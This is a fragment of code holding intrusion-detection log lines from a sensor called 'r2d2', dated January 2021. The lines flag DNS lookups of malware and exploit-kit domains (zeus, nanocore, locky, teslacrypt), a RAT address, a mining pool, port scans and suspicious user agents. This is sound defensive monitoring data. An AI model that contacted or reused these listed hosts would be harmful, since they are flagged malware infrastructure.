    '"2021-01-11 00:05:57.806659" r2d2 2.200.107.146 48953 173.201.73.26 53 UDP DNS banking.techpool.org "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 00:05:58.112949" r2d2 2.200.110.233 63974 2.200.107.168 53 UDP DNS tredokilo745241.ru "zeus (malware)" (static)\n' +
    '"2021-01-11 00:05:59.620688" r2d2 2.200.107.146 21588 194.62.182.53 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 00:05:59.608415" r2d2 2.200.110.232 63431 2.200.107.168 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 00:05:59.620991" r2d2 2.200.110.232 65158 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 00:06:01.274329" r2d2 2.200.110.233 63394 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 00:06:01.274344" r2d2 2.200.110.233 63480 2.200.107.168 53 UDP DNS (www).jesusdenazaret.com.ve "locky (malware)" (static)\n' +
    '"2021-01-11 00:06:01.277069" r2d2 2.200.107.146 35819 45.175.22.4 53 UDP DNS (www).jesusdenazaret.com.ve "locky (malware)" (static)\n' +
    '"2021-01-11 00:06:11.106857" r2d2 10.3.160.42 22860 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 00:06:11.206392" r2d2 10.3.160.42 22860 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 00:06:11.308570" r2d2 10.3.160.42 22860 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 00:06:11.812156" r2d2 10.3.160.42 22860 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 00:06:12.207174" r2d2 10.3.160.42 22860 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 00:06:12.706120" r2d2 10.3.160.42 22860 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 00:06:13.309297" r2d2 10.3.160.42 22860 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 00:06:18.517880" r2d2 2.200.110.233 64362 2.200.107.168 53 UDP DNS supervision.sactown.us "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 00:06:19.708041" r2d2 2.200.110.233 65216 2.200.107.168 53 UDP DNS recenthosts.ru "generic (malware)" (static)\n' +
    '"2021-01-11 00:06:18.000637" r2d2 8.210.151.146 34086,37166,38752,42996,44530,49556,50020,50670,51964,58316,59370,59992 2.200.106.136 22,222,443,444,666,2222,2223,2323,5555,8022,22222,55554 TCP IP 8.210.151.146 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 00:06:49.578801" r2d2 2.200.110.233 63557 2.200.107.168 53 UDP DNS un-blocking.info "bad wpad (suspicious)" (static)\n' +
    '"2021-01-11 00:06:49.580698" r2d2 2.200.107.146 4814 3.82.52.102 53 UDP DNS un-blocking.info "bad wpad (suspicious)" (static)\n' +
    '"2021-01-11 00:06:59.607871" r2d2 2.200.110.232 65509 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.42kdb12.net "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 00:07:07.818646" r2d2 2.200.110.233 63790 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.42kdb12.net "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 00:07:11.275304" r2d2 2.200.110.232 64109 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 00:07:11.290626" r2d2 2.200.107.146 26760 194.62.182.53 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 00:07:11.325239" r2d2 2.200.110.233 65248 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 00:07:16.258771" r2d2 2.200.107.146 17484 204.61.216.98 53 UDP DNS 7tno4hib47vlep5o.tor2web.fi "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 00:07:16.257118" r2d2 2.200.110.233 64827 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.tor2web.fi "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 00:07:26.838187" r2d2 2.200.107.168 53 2.200.110.232 64144 UDP DNS (leicon).it "parked site (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:07:26.838181" r2d2 2.200.107.168 53 2.200.110.232 64144 UDP DNS (leicon).it "parked site (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:07:43.382468" r2d2 2.200.110.232 63463 2.200.107.168 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 00:07:43.387429" r2d2 2.200.107.146 9173 45.54.64.53 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 00:08:08.277216" r2d2 2.200.104.32 50553 2.23.97.219 80 TCP UA "Windows-Update-Agent/10.0.10011.16384 Client-Protocol/1.40" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:08:08.517900" r2d2 192.168.30.247 50553 2.23.97.219 80 TCP UA "Windows-Update-Agent/10.0.10011.16384 Client-Protocol/1.40" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:08:08.276887" r2d2 192.168.30.247 50553 2.23.97.219 80 TCP UA "Windows-Update-Agent/10.0.10011.16384 Client-Protocol/1.40" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:08:08.518307" r2d2 2.200.104.32 50553 2.23.97.219 80 TCP UA "Windows-Update-Agent/10.0.10011.16384 Client-Protocol/1.40" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:08:08.276892" r2d2 192.168.30.247 50553 2.23.97.219 80 TCP UA "Windows-Update-Agent/10.0.10011.16384 Client-Protocol/1.40" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:08:08.742530" r2d2 2.200.104.32 50553 2.23.97.219 80 TCP UA "Windows-Update-Agent/10.0.10011.16384 Client-Protocol/1.40" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:08:18.012249" r2d2 2.200.110.232 63531 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 00:08:18.015192" r2d2 2.200.107.146 61748 52.50.73.4 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 00:08:18.063788" r2d2 2.200.110.233 64109 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 00:08:18.453700" r2d2 2.200.110.135 26741 8.8.8.8 53 UDP DNS (sdk0.520.gdxox).ml "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:08:18.453691" r2d2 2.200.110.135 26741 8.8.8.8 53 UDP DNS (sdk0.520.gdxox).ml "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:08:19.075123" r2d2 2.200.97.3 16855 138.197.76.50 53 UDP DNS (sdk0.520.gdxox).ml "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:08:20.768096" r2d2 2.200.110.233 49242 2.200.107.168 53 UDP DNS jesusdenazaret.com.ve "locky (malware)" (static)\n' +
    '"2021-01-11 00:08:21.364644" r2d2 2.200.110.233 65411 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 00:08:21.325678" r2d2 2.200.110.232 64464 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 00:08:21.329661" r2d2 2.200.107.146 26829 194.62.182.53 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 00:08:13.625670" r2d2 192.168.30.247 50553 2.23.97.219 80 TCP UA "Windows-Update-Agent/10.0.10011.16384 Client-Protocol/1.40" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:08:13.626217" r2d2 2.200.104.32 50553 2.23.97.219 80 TCP UA "Windows-Update-Agent/10.0.10011.16384 Client-Protocol/1.40" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:08:15.799542" r2d2 2.200.104.32 50553 2.23.97.219 80 TCP UA "Windows-Update-Agent/10.0.10011.16384 Client-Protocol/1.40" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:08:16.271218" r2d2 192.168.30.247 50553 2.23.97.219 80 TCP UA "Windows-Update-Agent/10.0.10011.16384 Client-Protocol/1.40" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:08:19.763875" r2d2 10.1.19.42 58944 208.68.240.103 80 TCP UA "OINC (BOINC client \\(windows_x86_64 7.16.7\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:08:48.103460" r2d2 178.17.174.14 59918 2.200.109.24 80 TCP UA "FunWebProducts (Mozilla/4.0 \\(compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; FunWebProducts; BTRS31753; .NET CLR 2.0.50727; FunWebProducts; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.1\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:08:59.607795" r2d2 2.200.110.232 64024 2.200.107.168 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 00:08:59.612289" r2d2 2.200.107.146 44762 45.54.64.53 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 00:09:12.892989" r2d2 178.17.174.14 33960 2.200.109.24 80 TCP UA "FunWebProducts (Mozilla/4.0 \\(compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; FunWebProducts; BTRS25111; .NET CLR 1.1.4322; FunWebProducts; yie8\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:09:27.227612" r2d2 2.200.110.232 65524 2.200.107.168 53 UDP DNS iynus.net "locky (malware)" (static)\n' +
    '"2021-01-11 00:09:27.233773" r2d2 2.200.107.146 15886 192.43.172.30 53 UDP DNS iynus.net "locky (malware)" (static)\n' +
    '"2021-01-11 00:09:27.276419" r2d2 2.200.110.233 63769 2.200.107.169 53 UDP DNS iynus.net "locky (malware)" (static)\n' +
    '"2021-01-11 00:09:27.277457" r2d2 2.200.110.232 49455 2.200.107.168 53 UDP DNS supervision.sactown.us "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 00:09:27.352446" r2d2 2.200.110.232 65381 2.200.107.168 53 UDP DNS soaring.betsystemreviews.com "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 00:09:27.357371" r2d2 2.200.107.146 41784 212.18.249.42 53 UDP DNS (2td6).xyz "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:09:27.353577" r2d2 2.200.110.232 63987 2.200.107.168 53 UDP DNS (2td6).xyz "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:09:27.367798" r2d2 2.200.110.232 65162 2.200.107.168 53 UDP DNS foley.go2lightuniversity.com "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 00:09:27.396574" r2d2 2.200.110.233 49318 2.200.107.169 53 UDP DNS soaring.betsystemreviews.com "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 00:09:27.567670" r2d2 2.200.110.232 64094 2.200.107.168 53 UDP DNS recenthosts.ru "generic (malware)" (static)\n' +
    '"2021-01-11 00:09:27.755456" r2d2 2.200.110.233 65004 2.200.107.169 53 UDP DNS (7tno4hib47vlep5o).42kjb11.net "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 00:09:27.727474" r2d2 2.200.110.232 49359 2.200.107.168 53 UDP DNS (7tno4hib47vlep5o).42kjb11.net "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 00:09:27.729359" r2d2 2.200.107.146 25375 192.31.80.30 53 UDP DNS (7tno4hib47vlep5o).42kjb11.net "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 00:09:27.849770" r2d2 2.200.110.232 65503 2.200.107.168 53 UDP DNS banking.techpool.org "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 00:09:28.199073" r2d2 2.200.110.232 64322 2.200.107.168 53 UDP DNS tredokilo745241.ru "zeus (malware)" (static)\n' +
    '"2021-01-11 00:09:31.027818" r2d2 2.200.110.232 64349 2.200.107.168 53 UDP DNS jesusdenazaret.com.ve "locky (malware)" (static)\n' +
    '"2021-01-11 00:09:31.368297" r2d2 2.200.110.232 64698 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 00:09:31.393977" r2d2 2.200.110.233 63296 2.200.107.169 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 00:09:31.498253" r2d2 2.200.110.232 64716 2.200.107.168 53 UDP DNS (www).jesusdenazaret.com.ve "locky (malware)" (static)\n' +
    '"2021-01-11 00:10:33.936519" r2d2 2.200.104.184 64159 205.251.192.236 53 UDP DNS juronu.com "pua (suspicious)" (static)\n' +
    '"2021-01-11 00:10:34.022213" r2d2 2.200.104.184 61395 205.251.192.236 53 UDP DNS juronu.com "pua (suspicious)" (static)\n' +
    '"2021-01-11 00:10:37.381889" r2d2 2.200.110.233 64260 2.200.107.168 53 UDP DNS (2td6).xyz "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:10:37.432971" r2d2 2.200.110.233 63702 2.200.107.168 53 UDP DNS foley.go2lightuniversity.com "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 00:10:41.399780" r2d2 2.200.110.232 64518 2.200.107.169 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 00:10:41.403436" r2d2 2.200.107.146 1025 194.62.183.53 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 00:10:41.426604" r2d2 2.200.110.233 63327 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 00:10:42.296679" r2d2 10.1.81.47 64750 10.1.20.50 53 UDP DNS id.remoteutilities.com "rmsrat (malware)" (static)\n' +
    '"2021-01-11 00:10:43.385484" r2d2 2.200.110.232 64355 2.200.107.169 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 00:10:48.267472" r2d2 2.200.107.146 62875 192.36.144.107 53 UDP DNS ns1.frobbit.se "rogue dns (malicious)" (static)\n' +
    '"2021-01-11 00:10:48.320403" r2d2 2.200.107.146 53777 194.58.192.49 53 UDP DNS ns1.frobbit.se "rogue dns (malicious)" (static)\n' +
    '"2021-01-11 00:10:52.985588" r2d2 2.200.109.177 10307 108.163.130.184 5655 TCP IPORT 108.163.130.184:5655 "rmsrat (malware)" (static)\n' +
    '"2021-01-11 00:11:22.978648" r2d2 2.200.109.177 14957 108.163.130.184 5655 TCP IPORT 108.163.130.184:5655 "rmsrat (malware)" (static)\n' +
    '"2021-01-11 00:11:36.182122" r2d2 2.200.110.232 64978 2.200.107.169 53 UDP DNS cdnrep.reimage.com "pua (suspicious)" (static)\n' +
    '"2021-01-11 00:11:36.188073" r2d2 2.200.107.146 48638 173.245.59.92 53 UDP DNS cdnrep.reimage.com "pua (suspicious)" (static)\n' +
    '"2021-01-11 00:11:36.599478" r2d2 2.200.110.232 64953 2.200.107.169 53 UDP DNS (webservice).reimageplus.com "pua (suspicious)" (static)\n' +
    '"2021-01-11 00:11:38.566621" r2d2 10.1.140.58 54484 10.1.20.238 80 TCP UA "Windows-Update-Agent/10.0.10011.16384 Client-Protocol/1.40" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:11:43.387741" r2d2 2.200.110.232 64033 2.200.107.169 53 UDP DNS content-delivery.in "afrodita (malware)" (static)\n' +
    '"2021-01-11 00:11:43.397798" r2d2 2.200.110.232 63879 2.200.107.169 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 00:11:43.398449" r2d2 2.200.110.232 63789 2.200.107.169 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 00:11:43.408971" r2d2 2.200.107.146 33718 52.57.28.60 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 00:11:43.411569" r2d2 2.200.107.146 6751 204.16.253.53 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 00:11:38.566630" r2d2 10.1.140.58 54484 10.1.20.238 80 TCP UA "Windows-Update-Agent/10.0.10011.16384 Client-Protocol/1.40" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:11:38.566632" r2d2 10.1.140.58 54484 10.1.20.238 80 TCP UA "Windows-Update-Agent/10.0.10011.16384 Client-Protocol/1.40" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:11:47.509346" r2d2 2.200.110.233 64675 2.200.107.168 53 UDP DNS content-delivery.in "afrodita (malware)" (static)\n' +
    '"2021-01-11 00:11:48.083797" r2d2 2.200.110.233 65297 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 00:11:51.443858" r2d2 2.200.110.233 64599 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 00:11:59.609320" r2d2 2.200.107.146 31059 204.16.253.53 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 00:11:59.607920" r2d2 2.200.110.232 65055 2.200.107.169 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 00:12:11.679353" r2d2 10.3.160.42 22863 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 00:12:11.775710" r2d2 10.3.160.42 22863 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 00:12:11.875602" r2d2 10.3.160.42 22863 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 00:12:12.079797" r2d2 10.3.160.42 22863 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 00:12:12.377183" r2d2 10.3.160.42 22863 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 00:12:12.777704" r2d2 10.3.160.42 22863 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 00:12:13.876837" r2d2 10.3.160.42 22863 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 00:12:40.347752" r2d2 2.200.97.1 59046 8.8.8.8 53 UDP DNS checkip.dyndns.com "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 00:12:54.680122" r2d2 2.200.110.233 56716 2.200.107.168 53 UDP DNS epicunitscan.info "patchbrowse (malware)" (static)\n' +
    '"2021-01-11 00:12:54.681831" r2d2 2.200.107.146 18157 199.254.31.1 53 UDP DNS epicunitscan.info "patchbrowse (malware)" (static)\n' +
    '"2021-01-11 00:12:54.695324" r2d2 10.38.194.125 59501 10.1.194.235 53 UDP DNS epicunitscan.info "patchbrowse (malware)" (static)\n' +
    '"2021-01-11 00:12:54.696419" r2d2 2.200.110.232 53147 2.200.107.168 53 UDP DNS epicunitscan.info "patchbrowse (malware)" (static)\n' +
    '"2021-01-11 00:12:59.631821" r2d2 2.200.110.232 65189 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 00:13:00.401098" r2d2 10.38.194.125 63017 10.1.194.234 53 UDP DNS epicunitscan.info "patchbrowse (malware)" (static)\n' +
    '"2021-01-11 00:13:01.446480" r2d2 2.200.110.233 63997 2.200.107.169 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 00:13:07.801891" r2d2 10.38.194.125 58081 10.1.194.234 53 UDP DNS epicunitscan.info "patchbrowse (malware)" (static)\n' +
    '"2021-01-11 00:13:22.842072" r2d2 2.200.110.233 63692 2.200.107.169 53 UDP DNS un-blocking.info "bad wpad (suspicious)" (static)\n' +
    '"2021-01-11 00:13:23.186121" r2d2 10.38.194.125 59102 10.1.194.234 53 UDP DNS epicunitscan.info "patchbrowse (malware)" (static)\n' +
    '"2021-01-11 00:13:31.003107" r2d2 2.200.108.59 19119,19125,19127,19129,19130,19132,19133,19135,19137,19140,19143,19145,19146,19148,19149,19151,19153,32900,32986,33688,33958,34822,35500,36218,36728,37177,37178,37180,37183,37324,37344,38082,38906,39926,40044,40278,40572,41026,41580,42040,42228,42994,43314,43544,43546,43856,44340,44356,44672,44818,44920,45010,45672,46376,46540,47062,47340,47458,47510,48094,48542,49086,49766,50830,50930,51288,51394,52328,52718,53410,53824,54322,54586,55130,55680,56026,56444,56862,57352,57628,57934,58006,59496,59598,60596,60906 77.53.81.105 21,6289,6555,7282,7340,7422,8374,9419,9778,10242,10403,11736,12893,13841,15157,16187,16206,16558,16815,17577,17703,19075,21647,21892,22568,24545,25406,26092,27186,28419,29998,32355,32448,33176,33737,34796,34956,35675,36348,36404,37461,38190,41198,41845,42240,42246,42387,42839,44290,45476,45965,48117,48512,52368,54289,55176,56981,58261,58519,59541,59919,62086,63800,64970 TCP IP 2.200.108.59 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 00:13:31.000290" r2d2 2.200.108.59 19120,19121,19122,19126,19132,19135,19136,19137,19141,19142,19143,19144,19150,19153,32900,32986,32990,33108,33190,33242,34706,34822,34902,35264,35500,35984,36324,36566,36642,37175,37176,37177,37178,37180,37182,37344,38042,38082,39472,39906,40014,41580,42388,42994,43543,43545,43770,43856,43874,44340,44598,44810,44920,45078,45710,47458,48778,50010,50560,50830,51272,51288,52430,52718,53024,53156,53278,53316,54322,54978,54984,55130,55562,57140,57296,57628,58696,58904,59080,59496,59598,60596 77.53.81.105 21,6289,6918,7422,8374,9163,9419,9552,10809,11736,14601,16206,16405,16815,17577,17816,17843,18545,18628,18830,19075,21892,22540,25406,25438,25799,25914,26232,27186,28289,29229,32355,32448,32680,35080,37678,40310,40792,42839,43509,44680,45572,45660,46078,46572,46951,47187,48512,50295,51434,51889,53666,53676,54289,55176,55997,56179,56981,59541,59582,62086 TCP IP 2.200.108.59 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 00:13:32.000031" r2d2 2.200.108.59 19138,19139,19140,19146,19147,19148,19151,19152,32990,33040,34148,35984,36566,36642,36728,36928,37179,37181,37183,38026,38248,38318,39472,40278,41026,41550,42040,42872,43066,44048,44598,44672,44818,45010,45108,46376,46710,47214,47510,48378,48544,48778,52430,52550,53110,53170,53278,53316,53410,53994,54978,54984,55496,55562,55840,56026,56314,56806,57520,57888,57934,58006,58632,58696,58904,59080 77.53.81.105 21,6539,6582,6918,7181,7340,8263,9163,9552,10242,10499,12893,13305,15157,15442,16405,16558,17703,17816,18545,18830,20632,20713,21241,21647,22540,25799,28289,31093,33892,35675,38190,40569,41479,42240,43509,43868,43904,44290,45572,45660,46572,47187,48741,48869,51454,51889,55528,55803,56305,56561,57274,57753,58094,59919,63800 TCP IP 2.200.108.59 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 00:13:43.383114" r2d2 2.200.110.232 63821 2.200.107.168 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 00:13:43.386943" r2d2 2.200.107.146 29633 45.54.64.53 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 00:13:56.010882" r2d2 2.200.109.177 47779 108.163.130.184 5655 TCP IPORT 108.163.130.184:5655 "rmsrat (malware)" (static)\n' +
    '"2021-01-11 00:13:59.626599" r2d2 2.200.110.232 63383 2.200.107.168 53 UDP DNS taxonprofits.com "cryptowall (malware)" (static)\n' +
    '"2021-01-11 00:13:55.935002" r2d2 10.1.19.42 58947 208.68.240.103 80 TCP UA "OINC (BOINC client \\(windows_x86_64 7.16.7\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:14:05.966119" r2d2 2.200.110.232 63722 2.200.107.168 53 UDP DNS (www).southlife.church "locky (malware)" (static)\n' +
    '"2021-01-11 00:14:05.967557" r2d2 2.200.107.146 60795 185.104.28.19 53 UDP DNS (www).southlife.church "locky (malware)" (static)\n' +
    '"2021-01-11 00:14:07.431352" r2d2 2.200.110.232 63388 2.200.107.168 53 UDP DNS (vio-ck-zvdnggdkkp).dynamic-m.com "dynamic domain (suspicious)" (static)\n' +
    '"2021-01-11 00:14:07.433777" r2d2 2.200.107.146 52078 205.251.199.82 53 UDP DNS (vio-ck-zvdnggdkkp).dynamic-m.com "dynamic domain (suspicious)" (static)\n' +
    '"2021-01-11 00:14:07.869989" r2d2 2.200.110.233 63451 2.200.107.169 53 UDP DNS taxonprofits.com "cryptowall (malware)" (static)\n' +
    '"2021-01-11 00:14:06.165338" r2d2 178.17.174.14 54702 2.200.109.24 80 TCP UA "FunWebProducts (Mozilla/4.0 \\(compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:14:11.457845" r2d2 2.200.107.146 59674 204.16.253.53 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 00:14:11.456374" r2d2 2.200.110.232 64175 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 00:14:11.481826" r2d2 2.200.110.233 49311 2.200.107.169 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 00:14:06.165333" r2d2 178.17.174.14 54702 2.200.109.24 80 TCP UA "FunWebProducts (Mozilla/4.0 \\(compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:14:06.165337" r2d2 178.17.174.14 54702 2.200.109.24 80 TCP UA "FunWebProducts (Mozilla/4.0 \\(compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:14:16.476588" r2d2 2.200.110.232 63773 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.tor2web.fi "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 00:14:18.265488" r2d2 10.43.193.193 53386 10.1.194.234 53 UDP DNS hahofaba.com "pua (suspicious)" (static)\n' +
    '"2021-01-11 00:14:18.289411" r2d2 2.200.110.232 53751 2.200.107.168 53 UDP DNS hahofaba.com "pua (suspicious)" (static)\n' +
    '"2021-01-11 00:14:18.267100" r2d2 2.200.110.233 55450 2.200.107.168 53 UDP DNS hahofaba.com "pua (suspicious)" (static)\n' +
    '"2021-01-11 00:14:50.302674" r2d2 10.38.194.125 63715 10.1.194.234 53 UDP DNS epicunitscan.info "patchbrowse (malware)" (static)\n' +
    '"2021-01-11 00:14:59.613197" r2d2 2.200.110.232 64212 2.200.107.168 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 00:14:59.624948" r2d2 2.200.110.232 63727 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 00:15:13.248222" r2d2 2.200.105.226 58477 208.67.222.123 53 UDP DNS pool.supportxmr.com "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 00:15:13.248363" r2d2 2.200.105.226 58477 208.67.222.123 53 UDP DNS pool.supportxmr.com "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 00:15:14.261677" r2d2 2.200.105.226 59629 208.67.222.123 53 UDP DNS pool.supportxmr.com "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 00:15:14.989035" r2d2 2.200.110.232 63844 2.200.107.168 53 UDP DNS southlife.church "locky (malware)" (static)\n' +
    '"2021-01-11 00:15:14.992510" r2d2 2.200.107.146 12975 178.62.208.8 53 UDP DNS southlife.church "locky (malware)" (static)\n' +
    '"2021-01-11 00:15:18.124210" r2d2 2.200.110.233 63684 2.200.107.169 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 00:15:21.490969" r2d2 2.200.107.146 9379 204.16.253.53 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 00:15:21.489100" r2d2 2.200.110.232 65067 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 00:15:21.517259" r2d2 2.200.110.233 65419 2.200.107.169 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
